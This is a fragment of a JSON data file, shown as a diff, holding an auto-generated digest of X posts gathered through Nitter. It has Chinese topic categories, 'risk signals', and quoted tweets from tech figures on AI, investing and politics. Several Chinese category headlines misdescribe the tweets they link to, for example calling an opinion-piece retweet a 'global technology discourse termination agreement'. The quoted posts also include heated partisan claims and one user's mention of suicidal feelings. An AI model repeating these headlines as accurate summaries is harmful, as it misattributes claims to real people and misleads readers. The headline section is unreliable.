"https://nitter.net/sama/status/2048755148361707946#m" + }, + { + "text": "用户界面安全更新说明", + "url": "https://nitter.net/sama/status/2048552677433643427#m" + } + ] + }, + { + "id": "c2", + "title": "技术观点", + "subtitle": "AI安全学界观察", + "level": "WARN", + "items": [ + { + "text": "关于灾难性管理风险的公开信", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m" + }, + { + "text": "基于原则的开发宣言", + "url": "https://nitter.net/sama/status/2048552677433643427#m" + } + ] + }, + { + "id": "c3", + "title": "机器人进步", + "subtitle": "工业部署加速", + "level": "P1", + "items": [ + { + "text": "双臂轮式人形机器人试运行", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m" + }, + { + "text": "Skild Brain芯片技术整合", + "url": "https://nitter.net/CyberRobooo/status/2048723908744954357#m" + } + ] + }, + { + "id": "c4", + "title": "企业战略", + "subtitle": "投资与转型要点", + "level": "P1", + "items": [ + { + "text": "价值投资新方法论文档", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m" + }, + { + "text": "AI对赌游戏数据解读", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m" + } + ] + }, + { + "id": "c5", + "title": "AI监管", + "subtitle": "国际合作进展", + "level": "P0", + "items": [ + { + "text": "跨平台存证技术标准发布", + "url": "https://nitter.net/EADS/status/2047481012826124516#m" + }, + { + "text": "全球技术话语权终止协议", + "url": "https://nitter.net/Bluesky/status/2048118689258487857#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "生成内容毒性蔓延", + "detail": "AI生成回复的伦理边界问题,需立即制定平台内容安全准则" + }, + { + "id": "r2", + "level": "MID", + "title": "政治两极分化加剧", + "detail": "极端言论引发的AI内容传播风险,涉及社会稳定性建模" + }, + { + "id": "r3", + "level": "OPP", + "title": "开放式模型商业机会", + "summary": "新兴企业建立超级AI用户界面系统", + "detail": "当模型组件化后需构建智能化开发环境,现有系统存在市场空缺" + }, + { + "id": "r4", + "level": "HIGH", + "title": "工作伦理崩坏危机", + "detail": "多相睡眠工作制度侵蚀专业人才培养体系" + }, + { + "id": "r5", + "level": "MID", + "title": "金融科技生态重构风险", + "detail": "数字财富重新分配机制导致传统金融业务萎缩" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T13:44:13.237379+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 33 | **成功获取**: 17 | **推文总数**: 145\n\n---\n\n### ✅ @sama — Sam Altman(10 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ⚠️ @andrejkarpathy — Andrej Karpathy(获取失败)\n\n- 错误: URLError: \n\n### ✅ @ylecun — Yann LeCun(10 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://nitter.net/ylecun/status/2048399621492236615#m)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://nitter.net/PhillyInquirer/status/2048118689258487857#m)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://nitter.net/internetarchive/status/2048069805807128734#m)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://nitter.net/ihtesham2005/status/2047680485208531152#m)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://nitter.net/Discoplomacy/status/2047676640059154653#m)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://nitter.net/maddenifico/status/2047454244781818205#m)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(10 条)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://nitter.net/GaryMarcus/status/2048757233174122827#m)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://nitter.net/GaryMarcus/status/2048746152749846549#m)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://nitter.net/GaryMarcus/status/2048742983684784239#m)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://nitter.net/GaryMarcus/status/2048739005525877072#m)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://nitter.net/atmoio/status/2048608025464705084#m)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://nitter.net/GaryMarcus/status/2048593283639894520#m)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://nitter.net/SteveStricklan6/status/2048589239915577837#m)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://nitter.net/suchenzang/status/2048582672163995766#m)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://nitter.net/FrankRundatz/status/2048579079121555764#m)\n\n---\n\n### ✅ @elonmusk — Elon Musk(10 条)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://nitter.net/elonmusk/status/2048600964102246438#m)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://nitter.net/elonmusk/status/2048589691054694406#m)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://nitter.net/elonmusk/status/2048543344746250466#m)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://nitter.net/elonmusk/status/2048535299102265720#m)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T17:27:34+00:00]**\n> RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California\n[原文链接](https://nitter.net/SpaceX/status/2048453949381091634#m)\n\n**[2026-04-26T17:05:40+00:00]**\n> RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?\n[原文链接](https://nitter.net/KonstantinKisin/status/2048448438715445382#m)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://nitter.net/RobertMSterling/status/2048435593244237849#m)\n\n**[2026-04-26T13:13:50+00:00]**\n> RT by @elonmusk: How do you think the left redistributes wealth? Violence How do you think the left seizes the means of production? Violence How do you think they censor and surveil opponents? Violen…\n[原文链接](https://nitter.net/TheAliceSmith/status/2048390094529216982#m)\n\n---\n\n### ✅ @paulg — Paul Graham(10 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://nitter.net/paulg/status/2048704073356935676#m)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://nitter.net/paulg/status/2048701354672050286#m)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://nitter.net/paulg/status/2048677984106664227#m)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://nitter.net/jasonfreedman/status/2048615296613937201#m)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://nitter.net/DennisonBertram/status/2048413815675539816#m)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://nitter.net/paulg/status/2048413578789634100#m)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://nitter.net/paulg/status/2048411898081583547#m)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://nitter.net/paulg/status/2048411021329453562#m)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://nitter.net/haaretzcom/status/2048396013816152216#m)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://nitter.net/NickKristof/status/2048043843690561556#m)\n\n---\n\n### ✅ @naval — Naval Ravikant(10 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(10 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(10 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(10 条)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(10 条)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: URLError: \n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: URLError: \n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(10 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(0 条)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(10 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as 